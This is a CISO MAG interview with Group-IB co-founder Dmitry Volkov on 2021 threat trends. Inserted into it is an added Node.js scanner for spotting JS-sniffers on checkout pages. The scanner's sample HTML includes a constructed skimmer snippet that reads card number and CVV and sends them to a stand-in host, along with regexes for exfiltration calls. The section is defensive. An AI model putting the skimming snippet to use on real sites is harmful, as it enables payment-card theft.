As a first-year student at Bauman Moscow State Technical University, Russia's leading engineering university, Dmitry Volkov co-founded Group-IB, then a cyber investigations startup. Seventeen years on, the company has grown into one of the cybersecurity leaders known for its engineering innovations. Group-IB now protects banks, industrial enterprises, and eCommerce giants in 60 countries, and offers solutions in the Threat and Fraud Hunting, Threat Intelligence & Attribution, and Digital Risk Protection categories. The company's services continue to play an important role in feeding the Group-IB Threat Hunting ecosystem, distributed across Singapore, Amsterdam, Hanoi, Moscow, Bahrain, and other locations, with unique first-hand cyberthreat intelligence.
Volkov is the mastermind behind most of Group-IB's products. From day one, he has been a prominent voice leading Group-IB toward becoming the go-to expert in threat hunting and intelligence. His team conducted the company's first, and later its most complex, cyber investigations and DFIR engagements. They have helped identify and track some of the most notorious threat actors, including Cobalt, Silence, MoneyTaker, and Lazarus.
Volkov is a recognized visionary leader. In 2015, Business Insider listed him as one of the top 7 professionals behind influential security companies. Dmitry is a firm believer in engineering neutrality and an advocate of cyber weapon non-proliferation. In 2013, Volkov became a member of the UN Open-ended Intergovernmental Expert Group, which conducts a comprehensive study on the problem of global cybercrime. Since 2016 he has been a member of the Europol EC3 Advisory Group on Internet Security.
In a recent interview with Augustin Kurian from CISO MAG, Volkov talks about cybersecurity trends in 2021, espionage attacks, and how scammers are already discussing topics such as vaccines on the dark web.
What, according to you, will continue to be a cybersecurity trend in 2021?
I'm sure that next year we will see even more ransomware operators joining Big Game Hunting, which refers to attacks on big companies with huge assets that are more likely to pay the ransom. With large companies continuing to make some primitive errors, like failing to promptly update software to patch vulnerabilities or using weak passwords, they are still an easy target for ransomware operators. The above also explains the continuous growth of the market for the sale of access to corporate networks, which, according to Group-IB forecasts, will continue to grow in the coming year.
Next year, in the light of rising tensions in MEA, Group-IB expects to see more sabotage campaigns by state-sponsored threat actors in the region. This might lead to dire consequences since intelligence agencies are attacking more aggressively. Their goal is now not only to spy on targets covertly but also to destroy critical infrastructure facilities.
The year 2021 is also likely to bring more attacks using JS-sniffers and POS malware, intended to gather bank card data (text data and bank card magnetic stripe data), which pose a major threat to online retail, especially in the U.S. JS-sniffers, which once were a seldom-studied type of malware, have become a mainstream tool for cybercriminals who make their living selling stolen textual data from bank cards. From H2 2019 to H1 2020 alone, the number of known JS-sniffer families grew from 38 to 96, while the techniques that prevent JS-sniffers from being detected on web resources have improved greatly.
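As an added illustration of the JS-sniffer threat described in the answer above (example code written for this page, not code from Group-IB or the interviewee), the following Node.js script runs two heuristic checks over the raw HTML of a checkout page: it flags external scripts that are either not on the shop's allow-list or lack a Subresource Integrity hash, which is how a sniffer usually gets onto the page, and it flags inline code that both reads card fields and uses a known exfiltration primitive. The hostnames (shop.example, cdn.example, stats-cdn.example), the allow-list, and the sample page are constructed for the example; the regexes are illustrative, not a complete detection rule set.

```javascript
// Added example for this page, not code from the interview or from Group-IB.
// A small, offline heuristic scan of a checkout page's HTML for the two things
// a JS-sniffer needs: a way onto the page (an unvetted or unpinned external
// script) and a way out (code that reads card fields and sends them somewhere).
// Hostnames and the sample page below are constructed for illustration.

const SAMPLE_CHECKOUT_HTML = `
<html><body>
<form id="pay">
  <input name="card_number"><input name="cvv"><input name="exp_date">
</form>
<script src="/static/checkout.js"></script>
<script src="https://cdn.example/lib.min.js" integrity="sha384-constructedHashValue"></script>
<script src="https://stats-cdn.example/s.js"></script>
<script>
  // Constructed sniffer-like snippet: reads card fields on submit and beacons them out.
  document.getElementById('pay').addEventListener('submit', function () {
    var pan = document.querySelector('[name=card_number]').value;
    var cvv = document.querySelector('[name=cvv]').value;
    new Image().src = 'https://stats-cdn.example/p.gif?d=' + btoa(pan + '|' + cvv);
  });
</script>
</body></html>`;

// Field names a sniffer typically reads, and the usual ways of exfiltrating them.
const CARD_FIELD_RE = /card[_-]?number|cardnumber|ccnum|cvv|cvc|exp(iry|_date)/i;
const EXFIL_RE = /\bfetch\s*\(|XMLHttpRequest|navigator\.sendBeacon|new\s+Image\s*\(|\.src\s*=/;

// Pull every <script> tag out of raw HTML: its src, integrity attribute and inline body.
function parseScripts(html) {
  const tagRe = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
  const srcRe = /\bsrc\s*=\s*["']([^"']+)["']/i;
  const integrityRe = /\bintegrity\s*=\s*["']([^"']+)["']/i;
  const scripts = [];
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const src = srcRe.exec(m[1]);
    const integrity = integrityRe.exec(m[1]);
    scripts.push({
      src: src ? src[1] : null,
      integrity: integrity ? integrity[1] : null,
      body: m[2],
    });
  }
  return scripts;
}

// Resolve a script URL (possibly relative) against the shop's own origin and return its host.
function hostOf(src, ownHost) {
  try {
    return new URL(src, `https://${ownHost}/`).hostname;
  } catch (e) {
    return null;
  }
}

// Return a list of findings; an empty list means nothing suspicious by these heuristics.
function scanCheckoutPage(html, { ownHost, allowedHosts }) {
  const findings = [];
  for (const s of parseScripts(html)) {
    if (s.src) {
      const host = hostOf(s.src, ownHost);
      if (!host) continue;
      if (!allowedHosts.includes(host)) {
        findings.push({ kind: 'unknown-third-party-script', src: s.src });
      }
      if (host !== ownHost && !s.integrity) {
        // Without Subresource Integrity a compromised CDN can swap the file for a sniffer.
        findings.push({ kind: 'external-script-without-sri', src: s.src });
      }
    } else if (CARD_FIELD_RE.test(s.body) && EXFIL_RE.test(s.body)) {
      findings.push({ kind: 'inline-card-read-and-exfil', snippet: s.body.trim().slice(0, 80) });
    }
  }
  return findings;
}

// Constructed policy for the hypothetical shop: its own origin plus one vetted CDN.
const SHOP_POLICY = { ownHost: 'shop.example', allowedHosts: ['shop.example', 'cdn.example'] };

console.log(JSON.stringify(scanCheckoutPage(SAMPLE_CHECKOUT_HTML, SHOP_POLICY), null, 2));
```

On the sample page the scan reports three findings: the stats-cdn.example script is both unknown and unpinned, and the inline handler reads the card number and CVV and sends them out through an image request. The same checks are cheap to run in CI against the rendered checkout template or in a scheduled fetch of the live page, which is one way to notice a sniffer before the card data turns up for sale.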
It is safe to say that the COVID-19 vaccine may take a fair share of the limelight in 2021. Do you think there would be an uptick in the number of phishing and ransomware attacks surrounding the same?
Threat actors always exploit hot topics in their attacks, and the vaccine will be no exception. Therefore, we are likely to see a lot of phishing emails and scams surrounding this subject. Already, we see various scammers discussing these topics on the dark web, though not very actively.
This year, several countries, including the U.S., admitted they were being targeted by state-sponsored espionage attacks surrounding vaccine development. With the varying success rate of different vaccines across the world, do you anticipate a surge in corporate espionage in 2021?
Espionage is always on the rise: new groups appear every year and old groups whose activities remained undetected are uncovered; tools and instruments to carry out the attacks are constantly being improved, and we see that state-sponsored attackers are only getting stronger. In the future, state-sponsored threat actors are likely to engage ordinary cybercriminals, purchasing access to corporate networks from them or recruiting them for espionage activities, which will lead to an even greater increase in spying. As I've already mentioned, the battle for the vaccine market has already begun, and we expect espionage around vaccine-related organizations to grow further.
In your recent report on cybercrime, Group-IB stated that it identified a continuing trend where physical destruction of infrastructure is replacing espionage. It also highlighted that seven new APT groups joined the global intelligence service stand-off. Can you share more details about it? And how big of a concern is it?
It would be correct to say that the attackers' focus has shifted from espionage alone to spying with subsequent sabotage, or physical destruction of infrastructure. To sabotage effectively, one must first gain access to a target network, do reconnaissance in the victim network, and obtain the desired resources. Only advanced nation-state attackers can carry out effective sabotage operations, and such campaigns are prepared for years. Since the results of sabotage campaigns become visible immediately, attackers normally reveal themselves only as a last resort and only in hot spots. It goes without saying that such attacks can lead to colossal losses. The sabotage campaigns we see today should be regarded as only a rehearsal, and judging from them, critical infrastructure facilities are not ready for a situation where such attacks become a general problem, given the constant growth in the number of state-sponsored Advanced Persistent Threat (APT) groups. It is noteworthy that cybersecurity researchers sometimes notice new APT groups only several years after they began their activity, which underlines how sophisticated these threat actors are.
By 2021, 5G will be widely available, and the floodgates will open, and both the white hats and black hats of the world will experience a swift learning curve in navigating the mass distribution and interconnectivity of 5G. What strategies should companies deploy to circumvent this impending threat landscape?
The architectural features of 5G (compared to 1/2/3/4G), such as superfast data transfers and other advantages of the new technology, are mainly implemented in software rather than on hardware platforms. It means that all threats to servers and software solutions are becoming relevant to 5G network operators. Such threats, including traffic manipulation and DDoS attacks, might become much more frequent and effective due to the large number of insecure connected devices and the wide bandwidth. I would, therefore, highlight three main points on the issue, in order of priority. The first one is research: it is necessary to invest as much as possible in 5G security research. The second one is inventory. Connected devices are very often vulnerable, and it is necessary to create a system to identify all new devices and monitor their status. Currently, existing solutions do not solve this problem well. The third one is protection. I would leave this point open because, while it is a necessary phase, it is unique to each organization.
From the standpoint of a zero-trust model, do you think it should be standard and by-design for the future?
This model can and must become the standard. We see more and more companies in the corporate sector building their cybersecurity in accordance with the zero-trust model, which confirms its viability.
About the Author
Augustin Kurian is part of the editorial team at CISO MAG and writes interviews and features.
This interview first appeared in the January 2021 issue of CISO MAG.